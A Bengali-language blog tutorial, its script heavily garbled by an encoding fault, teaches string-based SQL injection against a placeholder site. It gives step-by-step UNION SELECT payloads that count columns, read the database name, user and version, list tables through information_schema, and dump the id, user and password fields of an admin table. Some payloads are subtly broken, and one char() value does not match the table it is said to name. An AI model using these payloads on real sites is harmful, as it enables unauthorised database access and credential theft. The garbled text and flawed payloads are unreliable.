Web Site Hacking : String Based SQLi

āϏāĻŦাāχāĻ•ে āϏ্āĻŦাāĻ—āϤāĻŽ āφāĻŽাāϰ ⧍⧟ āϟিāωāϟোāϰি⧟াāϞে  :lol:

āĻ—āϤāĻŦাāϰেāϰ āϟিāωāϟোāϰি⧟াāϞে āφāĻŽি āϞেāĻ–েāĻ›িāϞাāĻŽ basic union based SQL INJECTION āύি⧟ে।
āφāϜāĻ•েāϰ āϟিāωāϟোāϰি⧟াāϞে āφāĻŽি āϞেāĻ–āĻŦো  String Based SQL Injection āύি⧟ে ।

SQL Injection āύি⧟ে āϞেāĻ–া āĻāϟা āφāĻŽাāϰ ⧍⧟ āϟিāωāϟোāϰি⧟াāϞ ।
āφāĻļা āĻ•āϰি āĻŽāύোāϝোāĻ— āĻĻি⧟ে āĻĒ⧜āĻŦেāύ।
āϚāϞুāύ āϤাāĻšāϞে āĻļুāϰু āĻ•āϰা āϝাāĻ•

(āϟিāωāϟোāϰি⧟াāϞ āϟি āĻļুāϧুāĻŽাāϤ্āϰ āĻļিāĻ•্āώāύী⧟ āωāĻĻ্āĻĻ্āϝেāĻļ্āϝে āϞিāĻ–িāϤ)

Union Based SQLi āĻ•ি āϏেāϟা āĻŦোāĻাāϰ āϜāύ্āϝে āφāĻŽাāϰ āφāĻ—েāϰ āϟিāωāϟোāϰি⧟াāϞāϟি āĻĻেāĻ–āϤে āĻĒাāϰেāύঃ Web Site Hacking : Union Based Sql Injection
āϏāĻšāϜ āĻ­াāĻŦে āĻŦুāĻাāϤে āĻ—েāϞে String Based Sql Injection āĻšāϞো āϝāĻ–āύ āĻāĻ•āϟি āϏাāχāϟ Sql Injection āĻ­ুāϞāύāϰাāĻŦāϞ āĻšā§Ÿ ।
āĻ•িāύ্āϤু āϝāĻ–āύ āφāϟ্āϝাāĻ•াāϰ Sql Injection āĻ•āĻŽাāύ্āĻĄ āĻāĻ•্āϏিāĻ•িāωāϟ āĻ•āϰে āϤāĻ–āύ āĻ•োāύো āϰেāϏাāϞ্āϟ āĻĻেāĻ–া⧟ āύা।

(āĻāĻ•āϟা āĻļিāĻ•্āώāύী⧟ āĻŦিāώ⧟ঃ Sql Injection āĻ•āϰাāϰ āϏāĻŽā§Ÿ āĻ…āύেāĻ• āϏাāχāϟে āĻĄাāϟা āĻ“ā§ŸেāĻŦ āĻĒেāχāϜে āĻĻেāĻ–া⧟ āύাāĻš।। āϏে āĻ•্āώেāϤ্āϰে āĻĄাāϟা āĻĻেāĻ–া⧟
āϟাāχāϟেāϞ āĻŦাāϰে āĻŦ্āϰাāωāϜাāϰেāϰ)

String Based SQL Injection āĻŦোāĻা āϝা⧟ āĻ…āύেāĻ• āϏāĻŽā§Ÿ āĻāϰāĻ•āĻŽ āĻāϰāϰ āĻĻেāĻ–ে ।
āĻāχ āϧāϰāύেāϰ āĻāϰāϰ।

"order by" doesn't work, example: order by 100--

āĻ…āύেāĻ• āϏāĻŽā§Ÿ āύাāĻ“ āĻĨাāĻ•āϤে āĻĒাāϰে āϏে āĻ•্āώেāϤ্āϰে āφāĻĒāύি āĻĒ্āϰāĻĨāĻŽে
Basic SQL āĻ…āύুāϏāϰāύ āĻ•āϰে āϝāĻĻি āĻ•োāύো āϰেāϏাāϞ্āϟ āύা āĻĒাāύ āϤাāĻšāϞে āϏ্āϟ্āϰিং āĻŦেāϜāĻĄ SQL injection āϟ্āϰাāχ āĻ•āϰে āĻĻেāĻ–āϤে āĻĒাāϰেāύ।

āφāϏāϞে string based sqli āĻšāϞে āφāĻĒāύি āĻ•āĻŽাāύ্āĻĄ āĻāĻ•্āϏিāĻ•িāωāϟ āĻ•āϰাāϰ āĻĒāϰāĻ“ āĻ•োāύো āϰেāϏাāϞ্āϟ āφāϏāĻŦে āύা ।

āϏাāχāϟāϟি āφāĻ—েāϰ āĻŽāϤāύāχ āύāϰāĻŽাāϞ āĻĻেāĻ–াāĻŦে।

Union Based āĻāϰ āϏাāĻĨে String Based āĻāϰ āĻŽāϧ্āϝে āϤেāĻŽāύ āĻ•োāύো āĻĒাāϰ্āĻĨāĻ•্āϝ āύেāχ।
āϤাāĻšāϞে āφāϏুāύ āĻļুāϰু āĻ•āϰা āϝাāĻ•।
āĻŽāύে āĻ•āϰুāύ āĻāϰāĻ•āĻŽ āĻāĻ•āϟি āϏাāχāϟে āφāĻŽāϰা SQLi āĻ•āϰāĻŦো।

http://site.com/index.php?id=10

āĻĒ্āϰāĻĨāĻŽেāχ SQLi āĻ­ুāϞāύাāϰāĻŦāϞ āύাāĻ•ি āĻĻেāĻ–āĻŦো Url āĻāϰ āĻļেāώে ' āĻāχ āϚিāĻš্āύ āϟি āĻĻি⧟ে

http://site.com/index.php?id=10'

āĻāϰāϰ āĻĻেāĻ–āϤে āĻĒেāϞে āφāĻŽাāĻĻেāϰ āĻ•াāϜ āĻšāĻŦে āϏাāχāϟāϟিāϤে āĻ•ā§Ÿāϟা āĻ•āϞাāĻŽ āφāĻ›ে āϏেāϟা āĻŦেāϰ āĻ•āϰা ।

āĻāĻ–āύ āφāĻŽāϰা āĻĒ্āϰāĻĨāĻŽেāχ Union Based āϚেāώ্āϟা āĻ•āϰে āĻĻেāĻ–āĻŦো ।

http://site.com/index.php?id=10 order by 10 (āĻ•োāύো āĻāϰāϰ āĻĻেāĻ–াāϚ্āĻ›ে āύা āĻŦা āĻĄাāϟা āĻŽিāϏ āĻšāϚ্āĻ›ে āύা)
order by āĻāϰ āĻĒāϰেāϰ āϏংāĻ–্āϝা āϟি āĻŦা⧜ি⧟ে āĻĻি⧟ে āĻĻেāĻ–ি

http://site.com/index.php?id=10 order by 1000 (āĻ•োāύো āĻāϰāϰ āĻĻেāĻ–াāϚ্āĻ›ে āύা āĻŦা āĻĄাāϟা āĻŽিāϏ āĻšāϚ্āĻ›ে āύা)

āϤাāĻšāϞে āĻāχ āϏাāχāϟāϟি āϤে āφāĻŽāϰা String Based SQLi āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰāĻŦো।

āϝাāϰ āϜāύ্āϝে āφāĻŽাāĻĻেāϰ id=value āĻāϰāĻĒāϰে āĻāĻ•āϟি ' (āϏ্āϟ্āϰিং) āϝুāĻ•্āϤ āĻ•āϰāϤে āĻšāĻŦে āĻāĻŦং āĻ•āĻŽাāύ্āĻĄ āĻāϰ āĻļেāώে --+ (āĻŽাāχāύাāϏ,āĻŽাāχāύাāϏ,āĻĒ্āϞাāϏ) āĻāχ āϏাāχāύ
āĻ—ুāϞো āϝুāĻ•্āϤ āĻ•āϰāϤে āĻšāĻŦে।
āϤাāĻšāϞে āĻĻেāĻ–িঃ
http://site.com/index.php?id=10' order by 10--+ (āĻŽāύে āĻ•āϰুāύ āĻāϰāϰ āĻĻেāĻ–āϤে āĻĒেāϞাāĻŽ)

āĻāĻ–āύ āϝāĻĻি āφāĻĒāύাāϰ āϟাāϰ্āĻ—েāϟ āϏাāχāϟে ā§§ā§Ļ āϟি āĻ•āϞাāĻŽ āύা āĻĨাāĻ•ে āϤাāĻšāϞে āφāĻĒāύি āĻāϰāϰ āĻĻেāĻ–āϤে āĻĒাāĻŦেāύ āĻŦা āϏাāχāϟāϟি āĻĨেāĻ•ে āĻĄাāϟা āĻŽিāϏ āĻ•āϰāĻŦে।
(āĻŦিঃāĻĻ্āϰঃ āϟিāωāϟোāϰি⧟াāϞāϟি āĻļিāĻ•্āώāύী⧟ āωāĻĻ্āĻĻ্āϝেāĻļ্āϝে āϞিāĻ–া āĻŦিāϧা⧟ āφāĻŽি āĻ•োāύো āϞাāχāĻ­ āϏাāχāϟ āύি⧟ে āĻĻেāĻ–াāϞাāĻŽ āύা।)

  • http://site.com/index.php?id=10' order by 9--+ (still Error)
  • http://site.com/index.php?id=10' order by 8--+ (Error)
  • http://site.com/index.php?id=10' order by 7--+ (Error)
  • http://site.com/index.php?id=10' order by 6--+ (No Error)

āϤাāϰ āĻŽাāύে āĻšāϞো āϏাāχāϟāϟি āϤে ā§Ŧ āϟি āĻ•āϞাāĻŽ ।
āĻāĻ–āύ āφāĻŽāϰা āĻāχ āĻ›ā§Ÿāϟি āĻ•āϞাāĻŽ āĻĨেāĻ•ে āĻ•োāύ āĻ•āϞাāĻŽ āϟি āĻ­ুāϞāύাāϰাāĻŦāϞ āĻŦা āϏ্āϟ্āϰিং āĻ•āϞাāĻŽ āϏেāϟা āϚেāĻ• āĻ•āϰāĻŦো āϝাāϰ āϜāύ্āϝে āĻ•āĻŽাāύ্āĻĄ āĻšāĻŦেঃ

  • http://site.com/index.php?id=-10' union select 1,2,3,4,5,6--+

āĻāĻ–āύ āϏাāχāϟেāϰ āĻĒেāχāϜে āĻŦা āĻŦ্āϰাāωāϜাāϰেāϰ āϟাāχāϟেāϞ āĻŦাāϰে āĻ­ুāϞāϰাāĻŦāϞ āĻ•āϞাāĻŽ/āĻ•āϞাāĻŽāϟিāϰ āύাāĻŽ্āĻŦাāϰ āĻĻেāĻ–াāĻŦে ।
(āĻ­ুāϞāύাāϰāĻŦāϞ āĻ•āϞাāĻŽেāϰ āϏংāĻ–্āϝা āĻ…āύেāĻ• āϏāĻŽā§Ÿ ⧍ āϟি āĻŦা āϤাāϰ āĻ…āϧিāĻ• āĻšāϤে āĻĒাāϰে)

āĻāĻ–āύ āφāĻŽāϰা āϝāĻĻি āĻ­ুāϞāύাāϰāĻŦāϞ āĻ•āϞাāĻŽ āĻĒা⧟ ⧍ āύāĻŽ্āĻŦāϰ āĻ•āϞাāĻŽ।
āϤাāĻšāϞে āφāĻŽāϰা āϏেāχ āĻ•āϞাāĻŽেāϰ āϜা⧟āĻ—া⧟ SQLi āĻ•āĻŽাāύ্āĻĄ āĻĻি⧟ে āĻĄাāϟাāĻŦেāϏ āĻĨেāĻ•ে āĻĄাāϟা āϰিāĻĄ āĻ•āϰāϤে āĻĒাāϰāĻŦো।

#āĻĒ্āϰāĻĨāĻŽে āĻĻেāĻ–ি āύি⧟ āĻĄাāϟাāĻŦেāϏেāϰ Version āĻ•ি āĻ“ Database Name āĻ•ি āĻāĻŦং Database User āĻāϰ āύাāĻŽ ।
āϝাāϰ āϜāύ্āϝে āφāĻŽāϰা āĻ•āĻŽাāύ্āĻĄ āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰāĻŦো " group_concat(database()),concat(user(),ox3a,version "

āωāĻĻাāĻšাāϰāύঃ

  • http://site.com/index.php?id=-10' union select 1,group_concat(database()),concat(user(),ox3a,version ,3,4,5,6--+

(āĻāĻ–াāύে āϝেāĻšুāϤু āĻ­ুāϞāύাāϰāĻŦāϞ āĻ•āϞাāĻŽ ⧍ āϤাāχ āφāĻŽāϰা ⧍ āύāĻŽ্āĻŦāϰ āĻāϰ āϜা⧟āĻ—া⧟ āφāĻŽাāĻĻেāϰ āĻ•āĻŽাāύ্āĻĄ āϰাāύ āĻ•āϰাāĻŦো)

āĻāĻ–āύ āφāĻŽāϰা
Version ,Database Name , Database User āĻāχāĻ—ুāϞা āĻĻেāĻ–āϤে āĻĒাāĻŦো ...
āĻāĻ–āύ āφāĻŽāϰা āϝāĻĻি āĻĄাāϟাāĻŦেāϜেāϰ āϟেāĻŦāϞ āĻ—ুāϞো āĻĻেāĻ–āϤে āϚা⧟ āϤাāĻšāϞে āĻ•āĻŽাāύ্āĻĄ āĻšāĻŦে

  • http://site.com/index.php?id=-10' union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--+-

āĻāĻ–āύ āφāĻŽāϰা āĻĄাāϟাāĻŦেāϏেāϰ āϟেāĻŦāϞ āĻ—ুāϞোāϰ āύাāĻŽ āĻĻেāĻ–āϤে āĻĒাāĻŦো।

āĻāĻ–āύ āϝāĻĻি āφāĻĒāύি āϝে āϟেāĻŦিāϞ āĻ—ুāϞো āĻĒেāϞেāύ āϤাāϰ āĻŽāϧ্āϝে āφāĻĒāύাāϰ āĻ•াāĻ™্āĻ–িāϤ āĻĄাāϟা āϝে āϟেāĻŦিāϞে āφāĻ›ে āϏেāχ āϟেāĻŦিāϞ āĻĨেāĻ•ে āĻ•āϞাāĻŽ āĻŦেāϰ āĻ•āϰāϤে āϚাāύ।
āĻŽāύে āĻ•āϰেāύ āϝে āφāĻĒāύি āĻĒে⧟েāĻ›েāύ "admin" āύাāĻŽে āĻāχ āϟেāĻŦিāϞ āϟি āĻāĻ–āύ āφāĻĒāύি āϝāĻĻি "admin" āϟেāĻŦিāϞেāϰ āĻ•āϞাāĻŽ āĻ—ুāϞো āĻĻেāĻ–āϤে āϚাāύ āϤাāϰ āϜāύ্āϝে āĻ•āĻŽাāύ্āĻĄ āĻšāĻŦে

āĻĒ্āϰāĻĨāĻŽে "admin" āϟেāĻŦিāϞ āύেāĻŽāϟিāĻ•ে āĻšেāĻ•্āϏে (hex) āĻ•āύāĻ­াāϰ্āϟ āĻ•āϰে āύিāϤে āĻšāĻŦে। āϝাāϰ āϜāύ্āϝে āĻŽোāϜিāϞা āĻŦ্āϰাāωāϜাāϰে āĻš্āϝাāĻ•āĻŦাāϰ āύাāĻŽে āĻāĻ•āϟি āĻāĻĄāĻ…āύ āφāĻ›ে
āϏেāϟা āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰāϤে āĻĒাāϰেāύ ।
"admin" āϟেāĻŦিāϞāĻ•ে āĻšেāĻ•্āϏে āϰুāĻĒাāύ্āϤāϰ āĻ•āϰাāϰ āĻĒāϰ āĻĒেāϞাāĻŽ 0x61646d696e

āĻāĻ–āύ āĻ•āĻŽাāύ্āĻĄāϟা āĻšāĻŦে।

āωāĻĻাāĻšাāϰāĻŖঃ

  • http://site.com/index.php?id=-10' union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=char(104,111,109,101,112,97,103,101,117,115,101,114,115)--+-

āĻāĻ–āύ āφāĻŽāϰা "admin" āϟেāĻŦিāϞেāϰ āĻ•āϞাāĻŽ āĻ—ুāϞো āĻĻেāĻ–āϤে āĻĒাāĻŦো।

āĻŽāύে āĻ•āϰুāύ āφāĻŽāϰা āĻĒেāϞাāĻŽঃ "id , user , password"
āĻāχ āϤিāύāϟি āĻ•āϞাāĻŽ āĻĒেāϞাāĻŽ । āĻāĻ–āύ āφāĻŽāϰা āϝāĻĻি āĻāχ āϤিāύāϟি āĻ•āϞাāĻŽ āĻĨেāĻ•ে āĻĄাāϟা āĻĄাāĻŽ্āĻĒ āĻ•āϰāϤে āϚা⧟ āĻŦা āĻš্āϝাāĻ• āĻ•āϰāϤে āϚা⧟ ।
āϤাāĻšāϞে āĻ•āĻŽাāύ্āĻĄ āĻšāĻŦে ।

āωāĻĻাāĻšাāϰāĻŖঃ

  • http://site.com/index.php?id=-10' union select 1,2,3,group_concat(id,0x3e,user,0x3e,password),5,6 from admin--+-

āĻāχ āĻ•āĻŽাāύ্āĻĄāϟি āφāĻŽাāĻĻেāϰ admin āϟেāĻŦিāϞেāϰ id,user,password āĻāχ āĻ•āϞাāĻŽ āĻ—ুāϞোāϰ āĻĄাāϟা āĻĻেāĻ–াāĻŦে :)

āϧāύ্āϝāĻŦাāĻĻ āĻ•āώ্āϟ āĻ•āϰে āĻĒ⧜াāϰ āϜāύ্āϝে ।
āĻ•োāύো āĻ…āϏুāĻŦিāϧা āĻšāϞে āĻ…āĻĨāĻŦা āĻ•োāύো āĻ•াāϰāĻŖে āϝোāĻ—াāϝোāĻ— āĻ•āϰāϤে āϚা⧟āϞে āφāĻŽাāϰ āĻĢেāχāϏāĻŦুāĻ• āφāχāĻĄিāϤে āϝোāĻ—াāϝোāĻ— āĻ•āϰāϤে āĻĒাāϰেāύঃ

FACEBOOK ID

āϧāύ্āϝāĻŦাāĻĻ – āĻŽূāϞ āϞেāĻ–āĻ•ে FACEBOOK ID

Previous
Next Post »

āĻĒোāϏ্āϟ āϏāĻŽ্āĻĒāϰ্āĻ•িāϤ āϏāĻŽāϏ্āϝাāϰ āϜāύ্āϝ āĻŽāύ্āϤāĻŦ্āϝ āĻĻিāύ।āĻĄাāωāύāϞোāĻĄ āϞিāĻ™্āĻ• āĻ āϏāĻŽāϏ্āϝা āϜāύ্āϝ āχāύāĻŦāĻ•্āϏ āĻ•āϰুāύ Aimzworld007
ConversionConversion EmoticonEmoticon

Thanks for your comment